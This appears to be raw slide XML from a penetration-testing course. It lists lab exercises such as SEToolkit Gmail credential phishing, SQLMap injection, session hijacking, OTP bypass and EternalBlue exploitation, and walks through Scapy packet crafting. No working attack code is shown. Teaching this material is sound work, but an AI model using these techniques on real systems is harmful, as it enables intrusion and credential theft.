              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4500" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="4500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4500" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="4500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4500" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1984" name="Google Shape;1984;p287"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4074122" y="4785315"/>
            <a:ext cx="1135800" cy="369300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>PART 3</a:t>
            </a:r>
            <a:endParaRPr sz="2700" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1985" name="Google Shape;1985;p287" descr="brupsuite 1"/>
          <p:cNvPicPr preferRelativeResize="0">
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="617220" y="3188494"/>
            <a:ext cx="8049600" cy="1885200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1986" name="Google Shape;1986;p287" descr="brupsuite"/>
          <p:cNvPicPr preferRelativeResize="0">
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="537686" y="984409"/>
            <a:ext cx="7886700" cy="2069400"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="1991" name="Google Shape;1991;p288"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="172700" y="216750"/>
            <a:ext cx="8614800" cy="643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64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>1. To perform active and passive reconnaissance using Meltago and HTtrack mirroring tools to collect technical information from any website.</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="A64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>2. Performing Automated Network Reconnaissance Using Recon-ng</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3. Collecting Information from Social Networking Sites Using Recon-ng Pushpin</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4. Full Scan, Half Open Scan and Stealth scan, Xmas scan …. Using NMAP and store scanning results in different Format</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="A64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>5. Capture HTTP Packet and identify User Id and Password using Wireshark </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6. Perform vulnerability scanning using Nessus tool</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7. Creating and analyzing spoofed emails using emkei.cz, online tool</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8. Intercept Web Traffic using Burp proxy</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9. Demonstrate Web Traffic Poisoning using Burp Suite</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10. Use Website Template of Gmail to capture userid and Password using SEToolkit</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11. Perform Host DIscovery, Service Discovery, Port Scanning using Using Metasploit</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12. Enumerates MySQL Info and Enumerates Directories Used by Web Servers by using NMAP</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13. To perform active and passive reconnaissance using Meltago and HTtrack mirroring tools to collect technical information from any website.</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14. Use Kali Linux on DVWA Cloud</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15.  Perform SQL injection attack using SQL Map in kaliLinux.</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16. Perform session hijacking using Zed Attack Proxy (ZAP).</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17. Exploiting vulnerabilities in android mobile operating system</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18. Perform wireless penetration testing using aircrack-ng.</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19. Demonstrate OTP Bypass using Burp Suite</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20. Packet crafting using “Packet creator” tools Capturing network packets using “wireshark”tool</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="A64D79"/>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a:solidFill>
                  <a:srgbClr val="A64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Manipulate / modify the packets using Colosoft“packetbuilder”, Study the packet behavior before &amp; after packet manipulation.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="A64D79"/>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a:solidFill>
                  <a:srgbClr val="A64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>21. Exploiting eternal blue vulnerability</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="A64D79"/>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a:solidFill>
                  <a:srgbClr val="A64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>22. Finding eternal blue vulnerability in windows 7 using “metasploit” tool (onKaliLinux)	and exploiting the same.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>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4256" y="698643"/>
            <a:ext cx="7459039" cy="3970318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Packet crafting is the process of manually creating or editing the existing data packets on a network to test network devices. Hackers and network admins use this process to test a network, check firewall rules, find entry points and test network device’s behaviors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network data packets contain various information include data, source address, destination address, version, length, protocol, and few other things depending on the protocol. In packet crafting, one creates a completely new packet or edits the existing packet to change the information packet contains. Then, this packet is sent to the network to see the response of network firewall. By changing values in packet, attackers try to find the entry point in the network to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>intrude</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>There are so many packet crafting tools here we are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>uing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>scapy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to perform packet crafting and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>analyse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> packets </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Scapy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>packet manipulation tool for computer networks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, originally written in Python by Philippe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Biondi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. It can forge or decode packets, send them on the wire, capture them, and match requests and replies. It can also handle tasks like scanning, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tracerouting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, probing, unit tests, attacks, and network discovery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="375688688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50" y="1027416"/>
            <a:ext cx="8537825" cy="3903968"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="63493" y="277402"/>
            <a:ext cx="8028160" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Just type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>scapy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> terminal, it will open an interface like this , if it is not there </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> will ask you </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>o install just type y and continue</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="209026251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580" y="657546"/>
            <a:ext cx="8702212" cy="4376580"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688369" y="267128"/>
            <a:ext cx="4940776" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In this step we are creating a single packet x as shown in fig</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1707531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0"/>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fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="46666"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Syntax of NMAP Command</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="378" name="Google Shape;378;p60"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385763" y="1234440"/>
            <a:ext cx="6086400" cy="2263500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-300196" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>MISC</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-300196" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>-6 Enable IPv6 Scaning</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-300196" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>-A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Enable OS detection, version detection,</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-300196" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>-O </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Enable OS detection</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-300196" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>-p &lt;port ranges&gt;: Only scan specified ports</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="60869"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2300">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>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29" y="965771"/>
            <a:ext cx="8198778" cy="3996436"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523982" y="256854"/>
            <a:ext cx="7207422" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Now open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> , here we are filtering to see only those packets that we are sending</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Now you can see no packets are arrived yet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="159967356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1383"/>
            <a:ext cx="9144000" cy="4099177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="452063" y="328773"/>
            <a:ext cx="4900701" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Now send that one packet which you have created packet x</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="107222502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0836"/>
            <a:ext cx="9144000" cy="4099177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="482885" y="308225"/>
            <a:ext cx="6950942" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>As you can see in fig we have received that one packet in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>wirehark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> what we have sent</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
